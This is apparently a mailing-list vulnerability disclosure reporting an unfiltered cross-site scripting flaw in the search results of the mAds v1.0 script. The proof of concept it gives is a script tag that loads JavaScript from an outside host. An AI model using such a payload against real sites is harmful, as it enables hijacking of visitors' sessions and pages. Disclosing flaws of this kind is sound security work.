mAds v1.0

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



mAds v1.0

Homepage:
http://lowpricescripts.com/product_info.php?products_id=51

Affected files:

*Searching

-----------------------------------

XSS vuln when searching:

Like the hotbot XSS vuln, when searching mAds returns with its results they are generated dynamically on screen, with no filtering at all. For a PoC as your search string put in:

<script src=http://www.youfucktard.com/xss.js></script>

Screenshots:

http://www.youfucktard.com/xsp/mads1.jpg

Im sure other vulnerabilities aside from XSS could be also possible due to this.
------------------------------------

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux